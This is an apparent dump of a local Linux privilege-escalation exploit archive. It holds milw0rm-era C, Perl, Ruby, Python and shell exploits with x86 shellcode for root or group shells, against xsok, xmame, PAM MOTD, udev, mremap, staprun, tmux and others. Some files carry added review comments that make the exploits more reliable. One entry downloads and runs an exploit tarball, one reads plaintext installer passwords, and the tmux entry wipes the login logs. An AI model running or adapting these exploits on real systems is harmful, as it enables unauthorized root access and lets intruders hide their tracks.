12 | #include 13 | 14 | #define BIN "/usr/games/xsok" 15 | #define RETADD 0xbffffa3c 16 | #define SIZE 200 17 | 18 | 19 | unsigned char shellcode[] = 20 | 21 | /* setregid (20,20) shellcode */ 22 | "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" 23 | "\xcd\x80" 24 | 25 | /* exec /bin/sh shellcode */ 26 | "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" 27 | "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; 28 | 29 | 30 | 31 | int main (int argc, char ** argv) 32 | { 33 | int i, ret = RETADD; 34 | char out[SIZE]; 35 | 36 | fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n"); 37 | fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n"); 38 | 39 | int *xsok = (int *)(out); 40 | 41 | for (i=0; i 22 | #include 23 | #include 24 | #include 25 | 26 | #define MREMAP_MAYMOVE 1 27 | #define MREMAP_FIXED 2 28 | 29 | #define __NR_real_mremap __NR_mremap 30 | 31 | static inline _syscall5( void 
*, real_mremap, void *, old_address, 32 | size_t, old_size, size_t, new_size, 33 | unsigned long, flags, void *, new_address ); 34 | 35 | int main( void ) 36 | { 37 | void *base; 38 | 39 | base = mmap( NULL, 8192, PROT_READ | PROT_WRITE, 40 | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); 41 | 42 | real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, 43 | (void *) 0xC0000000 ); 44 | 45 | fork(); 46 | 47 | return( 0 ); 48 | } 49 | 50 | // milw0rm.com [2004-01-06] 51 | -------------------------------------------------------------------------------- /linux/linux_exploits/1412.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/ruby 2 | 3 | # 4 | # One of the PoC code for xmame "-lang" options. 5 | # Advisory is base on : http://kerneltrap.org/node/6055 6 | # 7 | # by xwings at mysec dot org 8 | # url : http://www.mysec.org , new website 9 | 10 | # Tested on : 11 | # Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux 12 | # gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1) 13 | # xmame 0.102 , ./configure && make && make install 14 | # 15 | 16 | 17 | #setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes. 
18 | shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+ 19 | "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ 20 | "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+ 21 | "\x31\xdb\xcd\x80" 22 | 23 | vulnpath = "/usr/games/xmame.x11" 24 | argvopt = "-lang" 25 | 26 | ret = (0xbfffe8da) 27 | retadd = ([ret].pack('V')) 28 | 29 | nops = ("\x90" * (1056 - (shellcode.length + retadd.length))) 30 | buffer = nops+shellcode+retadd 31 | 32 | system(vulnpath,argvopt,buffer) 33 | 34 | # milw0rm.com [2006-01-10] 35 | -------------------------------------------------------------------------------- /linux/linux_exploits/1415.c: -------------------------------------------------------------------------------- 1 | /* 2 | Xmame 0.102 (-lang) Local Buffer Overflow Exploit 3 | Coded BY Qnix 4 | Qnix@bsdmail.org 5 | #0x11 @EFNET 6 | icq : 234263 7 | 0x11.org 8 | Advisory : http://kerneltrap.org/node/6055 9 | 10 | e.g: 11 | 12 | Qnix ~ # ./exploit /usr/games/bin/xmame.x11 13 | ************************************************** 14 | Xmame 0.102 (-lang) Local Buffer Overflow Exploit 15 | Coded BY Qnix 16 | ************************************************** 17 | 18 | (~) Stack pointer (ESP) : 0xbffff688 19 | (~) Offset from ESP : 0x0 20 | (~) Desired Return Addr : 0xbffff688 21 | 22 | GLINFO: loaded OpenGL library libGL.so! 23 | GLINFO: loaded GLU library libGLU.so! 24 | GLINFO: glPolygonOffsetEXT (2): not implemented ! 
25 | info: trying to parse: /usr/share/games/xmame/xmamerc 26 | info: trying to parse: /root/.xmame/xmamerc 27 | info: trying to parse: /usr/share/games/xmame/xmame-x11rc 28 | info: trying to parse: /root/.xmame/xmame-x11rc 29 | info: trying to parse: /usr/share/games/xmame/rc/robbyrc 30 | info: trying to parse: /root/.xmame/rc/robbyrc 31 | sh-3.00# 32 | 33 | */ 34 | 35 | #include 36 | #include 37 | 38 | #define BUFSIZE 1057 39 | #define NS 600 40 | 41 | char shellcode[] = 42 | "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" 43 | "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" 44 | "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" 45 | "\x68"; 46 | 47 | unsigned long sp(void) 48 | { __asm__("movl %esp, %eax");} 49 | 50 | int main(int argc, char *argv[]) 51 | { 52 | int i, offset; 53 | long esp, ret, *addr_ptr; 54 | char *buffer, *ptr; 55 | 56 | offset = 0; 57 | esp = sp(); 58 | ret = esp - offset; 59 | 60 | if(argc < 2 || argc != 2) 61 | { 62 | fprintf(stderr,"%s \n",argv[0]); 63 | return(0); 64 | } 65 | 66 | fprintf(stdout,"**************************************************\n"); 67 | fprintf(stdout,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit\n"); 68 | fprintf(stdout,"Coded BY Qnix\n"); 69 | fprintf(stdout,"**************************************************\n\n"); 70 | fprintf(stdout,"\t(~) Stack pointer (ESP) : 0x%x\n", esp); 71 | fprintf(stdout,"\t(~) Offset from ESP : 0x%x\n", offset); 72 | fprintf(stdout,"\t(~) Desired Return Addr : 0x%x\n\n", ret); 73 | 74 | buffer = malloc(BUFSIZE); 75 | 76 | ptr = buffer; 77 | addr_ptr = (long *) ptr; 78 | for(i=0; i < BUFSIZE; i+=4) 79 | { *(addr_ptr++) = ret; } 80 | 81 | for(i=0; i < NS; i++) 82 | { buffer[i] = '\x90'; } 83 | 84 | ptr = buffer + NS; 85 | for(i=0; i < strlen(shellcode); i++) 86 | { *(ptr++) = shellcode[i]; } 87 | 88 | buffer[BUFSIZE-1] = 0; 89 | 90 | execl(argv[1], "xmame.x11", "-lang", buffer, 0); 91 | 92 | free(buffer); 93 | 94 | return(0); 95 | 96 | } 97 
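| 98 | // milw0rm.com [2006-01-13]
99 | 
--------------------------------------------------------------------------------
/linux/linux_exploits/14273.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | #
3 | # Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
4 | # Date: July 7, 2010
5 | # Author: Kristian Erik Hermansen
6 | # Software Link: http://packages.ubuntu.com/
7 | # Version: pam-1.1.0
8 | # Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
9 | # CVE : CVE-2010-0832
10 | #
11 | # Notes: Affects Ubuntu 9.10 and 10.04 LTS
12 | # [Patch Instructions]
13 | # $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
14 | #
15 | # How it works: the real ~/.cache is moved aside (kept under ~/backup so it
16 | # can be restored) and replaced by a symlink to the target file.  On the next
17 | # login the vulnerable pam_motd code operates on ~/.cache and, through the
18 | # link, leaves the target owned by the invoking user (see the final message).
19 | #
20 | # Review notes: all paths are quoted, mkdir/mktemp/mv failures abort instead
21 | # of being silenced, and the script checks that ~/.cache is really gone before
22 | # linking -- `ln -sf` against a still-existing directory would quietly create
23 | # the link *inside* it and the exploit would fail with no indication.
24 | 
25 | if [ $# -eq 0 ]; then
26 |     echo "Usage: $0 /path/to/file"
27 |     exit 1
28 | fi
29 | 
30 | target=$1
31 | 
32 | mkdir -p "$HOME/backup" || { echo "Cannot create $HOME/backup"; exit 1; }
33 | tmpdir=$(mktemp -d --tmpdir="$HOME/backup/") || { echo "mktemp failed"; exit 1; }
34 | 
35 | # Move any existing ~/.cache (directory, or a symlink left by an earlier run) aside.
36 | if [ -e "$HOME/.cache" ] || [ -L "$HOME/.cache" ]; then
37 |     mv "$HOME/.cache" "$tmpdir/" || { echo "Cannot move $HOME/.cache aside"; exit 1; }
38 | fi
39 | if [ -e "$HOME/.cache" ] || [ -L "$HOME/.cache" ]; then
40 |     echo "$HOME/.cache still exists; refusing to continue"
41 |     exit 1
42 | fi
43 | 
44 | printf '\n@@@ File before tampering ...\n\n'
45 | ls -l "$target"
46 | ln -s "$target" "$HOME/.cache" || { echo "Cannot create symlink $HOME/.cache"; exit 1; }
47 | printf '\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n\n'
48 | 
--------------------------------------------------------------------------------
/linux/linux_exploits/144.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | 
5 | #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."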
6 | #define START 1 7 | #define END 33000 8 | 9 | int main(int argc, char **argv) 10 | { 11 | int i; 12 | char buf[150]; 13 | 14 | printf("\tSuSE 9.0 YaST script 15 | SuSEconfig.gnome-filesystem exploit\n"); 16 | printf("\t------------------------------------------------------------- 17 | \n"); 18 | printf("\tdiscovered and written by l0om 19 | \n"); 20 | printf("\t WWW.EXCLUDED.ORG\n\n"); 21 | 22 | if(argc != 2) { 23 | printf("usage: %s \n",argv[0]); 24 | exit(0xff); 25 | } 26 | 27 | printf("### hit enter to create or overwrite file % 28 | s: ",argv[1]); fflush(stdout); 29 | read(1, buf, 1); fflush(stdin); 30 | 31 | umask(0000); 32 | printf("working\n\n"); 33 | for(i = START; i < END; i++) { 34 | snprintf(buf, sizeof(buf),"%s%d",PATH,i); 35 | if(mkdir(buf,00777) == -1) { 36 | fprintf(stderr, "cannot creat directory [Nr.%d] 37 | \n",i); 38 | exit(0xff); 39 | } 40 | if(!(i%1000))printf("."); 41 | strcat(buf, "/found"); 42 | if(symlink(argv[1], buf) == -1) { 43 | fprintf(stderr, "cannot creat symlink from %s to %s 44 | [Nr.%d]\n",buf,argv[1],i); 45 | exit(0xff); 46 | } 47 | } 48 | printf("\ndone!\n"); 49 | printf("next time the SuSE.gnome-filesystem script 50 | gets executed\n"); 51 | printf("we will create or overwrite file %s 52 | \n",argv[1]); 53 | return(0x00); 54 | } /* i cant wait for the new gobbles comic!! 
*/

// milw0rm.com [2004-01-15]
--------------------------------------------------------------------------------
/linux/linux_exploits/1445.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/1445.c
--------------------------------------------------------------------------------
/linux/linux_exploits/1449.c:
--------------------------------------------------------------------------------
/*
Change passwd 3.1 (SquirrelMail plugin )

Coded by rod hedor

web-- http://lezr.com

[local exploit]

* Multiple buffer overflows are present in the handling of command line arguments in chpasswd.
The bug allows a hacker to exploit the process to run arbitrary code.

Review notes:
 - The two #include lines below lost their header names when this listing
   was rendered; they are left as found.
 - Exploitation is a blind brute force: every iteration re-reads the stack
   pointer, bumps the guess by one and spawns a shell plus chpasswd, so
   the full 0x10000000 range is impractically slow.  Expect to stop it by
   hand.
 - i386 only: get_sp() assumes %eax carries the return value and the
   payload is 32-bit x86 Linux shellcode.
*/

#include
#include

/* 24 NOP bytes, then x86 Linux shellcode.  The bytes decode to
   setuid(0) (xor eax,eax; mov al,0x17; xor ebx,ebx; int 0x80) followed by
   execve("//bin/sh", ...) with the path built on the stack (push "n/sh",
   push "//bi"; mov al,0x0b; int 0x80).  sizeof(shellcode) below also
   copies the C literal's trailing NUL, which terminates the env string. */
const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
 "\x89\xe5\x31\xc0\x50\x55\x89\xe5"
 "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
 "\x2f\x62\x69\x89\xe3\x89\xe9\x89"
 "\xea\xb0\x0b\xcd\x80";

/* Returns the caller's stack pointer by leaving %esp in %eax; there is no
   return statement, so this relies on the compiler not touching %eax
   between the asm and the function's return. */
long get_sp(){
 __asm__("movl %esp,%eax;");
};

int main(){
 /* Layout of the environment string handed to putenv():
      [0..3]     "EGG="
      [4..107]   104 'x' filler bytes
      [108..111] guessed return address (native byte order)
      [112..]    NOP sled + shellcode (+ NUL)
    putenv() stores the pointer, not a copy, so rewriting buffer in the
    loop updates the live EGG entry that chpasswd inherits. */
 char buffer[1024];
 long stack = get_sp();
 int result = 1;
 long offset = 0;
 printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n");
 printf ("[+] Current stack [0x%x]\n",stack);
 while(offset <= 268435456){
 offset = offset + 1;
 stack = get_sp() + offset;
 memcpy(&buffer,"EGG=",4);
 int a = 4;
 while(a <= 108){
 memcpy(&buffer[a],"x",1);
 a = a + 1;}
 memcpy(&buffer[108],&stack,4);
 memcpy(&buffer[112],&shellcode,sizeof(shellcode));
 putenv(buffer);
 /* $EGG is expanded unquoted by /bin/sh, so a guessed address containing
    whitespace or glob characters is split or expanded before chpasswd
    sees it.  A zero exit status is taken to mean the shell ran and
    exited cleanly. */
 result = system("./chpasswd $EGG");
 if(result == 0){exit(0);};
 };
};

// milw0rm.com [2006-01-25]
--------------------------------------------------------------------------------
/linux/linux_exploits/15074.sh:
--------------------------------------------------------------------------------
Source: http://www.securityfocus.com/bid/43084/info

#!/bin/sh
# by fuzz. For Anux inc. #
# ubuntu 10.04 , 10.10
#
# Review notes:
#  - The "Source:" citation above the shebang means this file is not
#    directly executable as stored; run it as "sh 15074.sh <kernel-name>"
#    (the argument placeholder after $0 in the usage line was lost when
#    this listing was rendered).
#  - $1 is the udev KERNEL== match (a device name) that fires the rule.
#  - The rule is appended to the runtime rules file
#    /dev/.udev/rules.d/root.rules, so it needs write access to that
#    path and only takes effect once udev reloads its rules (the closing
#    messages spell out what that takes).
#  - $PWD is expanded while the here-documents are written, so the rule
#    and helper refer to this directory by absolute path; do not run it
#    from a location that is cleaned up before udev fires.
#  - The result is a root-owned, set-uid AND set-gid binary (chmod +s)
#    that any local user can run; remove it when done.
if [ -z "$1" ]
then
echo "usage: $0 "
echo "see here http://www.reactivated.net/writing_udev_rules.html"
exit
fi
# Helper that udev runs as root via RUN+=: hands ownership of the
# compiled shell to root and flips the set-id bits.
cat > usn985-exploit.sh << EOF
#!/bin/sh
chown root:root $PWD/usn985-sc
chmod +s $PWD/usn985-sc
EOF
# Tiny self-exploiting program: s is x86 Linux shellcode that zeroes
# eax/ebx/ecx/edx, pushes "//bin/sh" and calls execve.  main() appears
# to overwrite its own saved return address (two words above the local
# r) with the address of s, so returning from main jumps into the
# string.  This needs 32-bit code, no stack protector and an executable
# data segment; the resulting shell keeps euid 0 only if /bin/sh does
# not drop privileges itself.
cat > usn985-sc.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){int *r;*((int *)&r+2)=(int)s;}
EOF
gcc usn985-sc.c -o usn985-sc
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn985-exploit.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"
--------------------------------------------------------------------------------
/linux/linux_exploits/154.c:
--------------------------------------------------------------------------------
/*
 * Proof-of-concept exploit code for do_mremap() #2
 *
 * 
Copyright (C) 2004 Christophe Devine 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | 29 | #define MREMAP_MAYMOVE 1 30 | #define MREMAP_FIXED 2 31 | 32 | 33 | #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED 34 | 35 | 36 | #define __NR_real_mremap __NR_mremap 37 | 38 | 39 | static inline _syscall5( void *, real_mremap, void *, old_address, 40 | size_t, old_size, size_t, new_size, 41 | unsigned long, flags, void *, new_address ); 42 | 43 | 44 | #define VMA_SIZE 0x00003000 45 | 46 | 47 | int main( void ) 48 | { 49 | int i, ret; 50 | void *base0; 51 | void *base1; 52 | 53 | 54 | i = 0; 55 | 56 | 57 | while( 1 ) 58 | { 59 | i++; 60 | 61 | 62 | ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), 63 | VMA_SIZE, PROT_READ | PROT_WRITE, 64 | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); 65 | 66 | 67 | if( ret == -1 ) 68 | { 69 | perror( "mmap" ); 70 | break; 71 | } 72 | 73 | 74 | base0 = base1; 75 | base1 = (void *) ret; 76 | } 77 | 78 | 79 | printf( "created ~%d VMAs\n", i ); 80 | 81 | 82 | base0 += 0x1000; 83 | base1 += 0x1000; 84 | 85 | 86 | printf( "now mremapping 0x%08X at 0x%08X\n", 87 | (int) base1, (int) base0 ); 88 | 89 | 90 | real_mremap( base1, 4096, 4096, 
MREMAP_FLAGS, base0 ); 91 | 92 | 93 | printf( "kernel may not be vulnerable\n" ); 94 | 95 | 96 | return( 0 ); 97 | } 98 | 99 | 100 | // milw0rm.com [2004-02-18] 101 | -------------------------------------------------------------------------------- /linux/linux_exploits/15620.sh: -------------------------------------------------------------------------------- 1 | CVE-2010-4170 2 | 3 | printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever 4 | 5 | 6 | RHEL Advisory: 7 | https://rhn.redhat.com/errata/RHSA-2010-0894.html -------------------------------------------------------------------------------- /linux/linux_exploits/1579.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use warnings; 4 | use strict; 5 | 6 | ############################################################################## 7 | # Author: Kristian Hermansen 8 | # Date: 3/12/2006 9 | # Overview: Ubuntu Breezy stores the installation password in plain text 10 | # Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606 11 | ############################################################################## 12 | 13 | print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; 14 | print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n"; 15 | print "99% effective, thank your local admin ;-)\n"; 16 | print "FOR EDUCATIONAL PURPOSES ONLY!!!\n"; 17 | print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; 18 | 19 | # the two vulnerable files 20 | my $file1 = "/var/log/installer/cdebconf/questions.dat"; 21 | my $file2 = "/var/log/debian-installer/cdebconf/questions.dat"; 22 | 23 | print "Checking if an exploitable file exists..."; 24 | if ( (-e $file1) || (-e $file2) ) 25 | { 26 | print "Yes\nNow checking if readable..."; 27 | if ( -r $file1 ) 28 | { 29 | getinfo($file1); 30 | } 31 | else 32 | { 33 | if ( -r $file2 ) { 34 | getinfo($file2); 35 | } 36 | 
else { 37 | print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n"; 38 | exit(-2); 39 | } 40 | } 41 | } 42 | else 43 | { 44 | print "No\nFile may have been deleted by the administrator :-(\nExiting...\n"; 45 | exit(-1); 46 | } 47 | 48 | sub getinfo { 49 | my $fn = shift; 50 | print "Yes\nHere come the details...\n\n"; 51 | my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`; 52 | my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`; 53 | my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`; 54 | chomp($realname); 55 | chomp($user); 56 | chomp($pass); 57 | print "Real Name: $realname\n"; 58 | print "Username: $user\n"; 59 | print "Password: $pass\n"; 60 | } 61 | 62 | # milw0rm.com [2006-03-12] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/1591.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # gexp-python.py 4 | # 5 | # Python <= 2.4.2 realpath() Local Stack Overflow 6 | # ----------------------------------------------- 7 | # Against VA Space Randomization. 8 | # 9 | # Copyright (c) 2006 Gotfault Security 10 | # 11 | # Bug found and developed by: dx/vaxen (Gotfault Security), 12 | # posidron (Tripbit Research Group). 13 | # Enviroment: 14 | # 15 | # Kernel Version : 2.6.12.5-vs2.0 16 | # GCC Version : 4.0.3 17 | # Libc Version : 2.3.5 18 | # 19 | # Special greets goes to : posidron from tripbit.net 20 | # RFDSLabs, barros, izik, 21 | # Gotfault Security Community. 
22 | # 23 | # Original Reference: 24 | # http://gotfault.net/research/exploit/gexp-python.py 25 | 26 | import os 27 | 28 | # JMP *%ESP @ linux-gate.so.1 29 | jmp = "\x5f\xe7\xff\xff" 30 | 31 | shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" 32 | shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" 33 | shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" 34 | shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" 35 | 36 | os.chdir("/tmp") 37 | base = os.getcwd() 38 | dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) 39 | os.makedirs(dir) 40 | os.chdir(dir) 41 | 42 | os.system('> vuln.py; python vuln.py') 43 | os.remove("vuln.py") 44 | os.chdir(base) 45 | os.removedirs(dir) 46 | 47 | # milw0rm.com [2006-03-18] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/1596.txt: -------------------------------------------------------------------------------- 1 | # From Daniel Stone's Advisory 2 | # xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates 3 | # of X11R7.0, is vulnerable. 4 | # X11R6.9.0, and all release candidates, are vulnerable. 5 | # X11R6.8.2 and earlier versions are not vulnerable. 6 | 7 | # The rest is H D Moore from metasploit 8 | 9 | Two second exploit, but if anyone is lazy: 10 | 11 | $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz 12 | $ tar -zpxvf xmodulepath.tgz 13 | $ cd xmodulepath 14 | $ ./root.sh 15 | /bin/rm -f exploit.o exploit.so shell *.o *.so 16 | gcc -fPIC -c exploit.c 17 | gcc -shared -nostdlib exploit.o -o exploit.so 18 | gcc -o shell shell.c 19 | 20 | X Window System Version 7.0.0 21 | Release Date: 21 December 2005 22 | X Protocol Version 11, Revision 0, Release 7.0 23 | [ snip ] 24 | r00t # id 25 | uid=0(root) gid=100(users) groups=10(wheel),18(audio)... 
26 | 27 | # backup: http://www.exploit-db.com/sploits/xmodulepath.tgz 28 | 29 | # milw0rm.com [2006-03-20] 30 | -------------------------------------------------------------------------------- /linux/linux_exploits/15974.txt: -------------------------------------------------------------------------------- 1 | Source: http://www.securityfocus.com/bid/45051/info 2 | 3 | Mono and Moonlight is prone to a local privilege-escalation vulnerability. 4 | 5 | Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. 6 | 7 | PoC: 8 | 9 | using System; 10 | using System.Reflection; 11 | using System.Runtime.InteropServices; 12 | 13 | public class DelegateWrapper { 14 | public IntPtr method_ptr; 15 | } 16 | 17 | public delegate void MethodWrapper (); 18 | 19 | public class BreakSandbox { 20 | private static DelegateWrapper Convert (T dingus) where T : 21 | DelegateWrapper { 22 | return dingus; 23 | } 24 | 25 | private static DelegateWrapper ConvertDelegate (Delegate del) { 26 | var m = typeof (BreakSandbox).GetMethod ("Convert", 27 | BindingFlags.NonPublic | BindingFlags.Static); 28 | var gm = m.MakeGenericMethod (typeof (Delegate)); 29 | 30 | var d = (Func ) Delegate.CreateDelegate 31 | (typeof (Func ), null, gm); 32 | 33 | return d (del); 34 | } 35 | 36 | public static void Main (string [] args) { 37 | MethodWrapper d = delegate { 38 | Console.WriteLine ("Hello"); 39 | }; 40 | 41 | d (); 42 | var converted = ConvertDelegate (d); 43 | // Overwrite the already WX page with a 'ret' 44 | Marshal.WriteByte (converted.method_ptr, (byte) 0xc3); 45 | d (); 46 | } 47 | } 48 | 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/17083.pl: -------------------------------------------------------------------------------- 1 | # Exploit Title: HT Editor File openning Stack Overflow (0day) 2 | # Date: March 
30th 2011 3 | # Author: ZadYree 4 | # Software Link: http://hte.sourceforge.net/downloads.html 5 | # Version: <= 2.0.18 6 | # Tested on: Linux/Windows (buffer padding may differ on W32) 7 | # CVE : None 8 | 9 | #!/usr/bin/perl 10 | =head1 TITLE 11 | 12 | HT Editor <=2.0.18 0day Stack-Based Overflow Exploit 13 | 14 | 15 | =head2 SYNOPSIS 16 | 17 | my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; 18 | 19 | 20 | =head1 DESCRIPTION 21 | 22 | The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip. 23 | 24 | =head2 AUTHOR 25 | 26 | ZadYree ~ 3LRVS Team 27 | 28 | 29 | =head3 SEE ALSO 30 | 31 | ZadYree's blog: z4d.tuxfamily.org 32 | 33 | 3LRVS blog: 3lrvs.tuxfamily.org 34 | 35 | Shellcode based on http://www.shell-storm.org/shellcode/files/shellcode-606.php => Thanks 36 | =cut 37 | 38 | use strict; 39 | use warnings; 40 | 41 | use constant SHELLCODE => "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e". 42 | "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" . 43 | "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" . 44 | "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" . 45 | "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" . 46 | "\x53\x52\x54\x8a\xe2\xce\x81"; 47 | 48 | use constant NOPZ => ("\x90" x 3000); 49 | 50 | $ENV{'TAPZCODE'} = (NOPZ . SHELLCODE); 51 | 52 | open(my $fh, ">", "g3tenv.c"); 53 | print $fh <<"EOF"; 54 | #include 55 | void main() { 56 | printf("%x", getenv("TAPZCODE")); 57 | } 58 | EOF 59 | system("gcc g3tenv.c -o g3tenv"); 60 | my $retaddr = qx{./g3tenv}; 61 | 62 | my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . 
reverse(pack('H*', $retaddr))]; 63 | 64 | open(my $as, "<", "/proc/sys/kernel/randomize_va_space"); 65 | my $status = <$as>; 66 | close($as); 67 | unless ($status != 0) { 68 | unlink("g3tenv.c", "g3tenv"); 69 | exec(@$payload); 70 | } 71 | print "[*]ASLR detected!\012"; 72 | print "[*]Bruteforcing ASLR...\012"; 73 | while (1) { 74 | $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; 75 | qx{@$payload}; 76 | last unless ($? == 11); 77 | } 78 | unlink("g3tenv.c", "g3tenv"); 79 | die "HAPPY Hacking!"; 80 | -------------------------------------------------------------------------------- /linux/linux_exploits/17147.txt: -------------------------------------------------------------------------------- 1 | --------------------------------------- 2 | | Team ph0x90bic proudly presents | 3 | | tmux -S 1.3/1.4 local utmp exploit | 4 | --------------------------------------- 5 | 6 | # Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability 7 | # Date: 11.04.2011 8 | # Author: ph0x90bic 9 | # Software Link: http://tmux.sourceforge.net/ 10 | # Version: 1.3/1.4 11 | # Tested on: Linux debian 2.6.26-1-686 12 | # CVE : CVE-2011-1496 13 | 14 | --- 15 | 16 | INTRODUCTION 17 | 18 | tmux 1.3/1.4 contains a privilege escalation vulnerabillity, 19 | which gives you utmp group privileges. This bug is important, 20 | because it is possible to clean logfiles and use logcleaners 21 | for btmp, wtmp and lastlog without local root access. 
22 | 23 | --- 24 | 25 | EXPLOIT 26 | 27 | Execute shell as utmp group 28 | 29 | $ tmux -S /tmp/.whateveryouwant -c id 30 | uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) 31 | 32 | $ tmux -S /tmp/.whateveryouwant -c /bin/sh 33 | $ id 34 | uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) 35 | 36 | -- 37 | 38 | Delete logfiles 39 | 40 | $ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog' 41 | $ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp' 42 | $ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp' 43 | 44 | -- 45 | 46 | Use logcleaner software 47 | 48 | $ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/180.c: -------------------------------------------------------------------------------- 1 | /* (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo.org]. 2 | this will give you an egid=60(games) shell if gnomehack is sgid(=2755) games 3 | on debian/2.2, which has gnomehack. (this 